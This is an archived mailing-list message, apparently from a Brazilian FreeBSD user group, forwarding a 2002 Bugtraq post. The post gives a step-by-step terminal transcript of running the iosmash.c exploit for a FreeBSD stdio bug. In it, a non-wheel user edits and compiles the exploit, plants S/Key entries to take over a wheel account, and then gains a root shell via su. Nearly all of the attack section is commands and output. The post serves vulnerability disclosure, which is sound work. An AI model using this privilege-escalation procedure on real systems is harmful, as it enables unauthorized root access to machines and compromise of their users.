[FUGSPBR] En: full info on iosmash.c as non wheel user
Flavio Alberto
applein em tutopia.com.br
Qua Abr 24 22:19:01 BRT 2002
----- Original Message -----
From: John Scimone <jscimone em cc.gatech.edu>
To: <bugtraq em securityfocus.com>
Cc: <vuln-dev em securityfocus.com>
Sent: Tuesday, April 23, 2002 7:25 PM
Subject: full info on iosmash.c as non wheel user
> Quer ter seu próprio endereço na Internet?
> Garanta já o seu e ainda ganhe cinco e-mails personalizados.
> DomíniosBOL - http://dominios.bol.com.br
>
>
>
>
>
> from phased....
>
> I didnt think such would be necessary but due to the high volume of emails
it
> has proved so, below is a transcript of exploiting the stdio bug on
freebsd as
> a user not in the wheel group
>
> Welcome to FreeBSD!
> > id
> uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
> >
> > grep wheel /etc/group
> wheel:*:0:root,akt0r-root,misterx
> >
> > perl -pi -e 's/root /misterx /g' iosmash.c
> > gcc -o iosmash.c iosmash
> >./iosmash
> Adding d0tslash:
> <--- HIT CTRL-C --->
> > grep 98 iosmash.c
> s/key 98 snosoft2
> 98: MASS OAT ROLL TOOL AGO CAM
> "\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666
> 01:02:0
> 3\n");
> > su misterx
> s/key 98 snosoft2
> Password:MASS OAT ROLL TOOL AGO CAM
> %pwd
> /usr/home/d0tslash
> %id
> uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
> 1006(cvsusers)
> %cd ~
> %grep "root " iosmash.c
> decided to make a trivial exploit to easily get root :)
> "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666
01:02:03\n");
> %gcc -o iosmash iosmash.c
> %./iosmash
> Updating misterx:
> Old key: snosoft2
> <--- HIT CTRL-C --->
> %su
> s/key 98 snosoft2
> Password:MASS OAT ROLL TOOL AGO CAM
> xes#
>
>
----
Para sair da lista envie um e-mail para majordomo em fugspbr.org
com as palavras "unsubscribe fugspbr" no corpo da mensagem.
Mais detalhes sobre a lista de discussão freebsd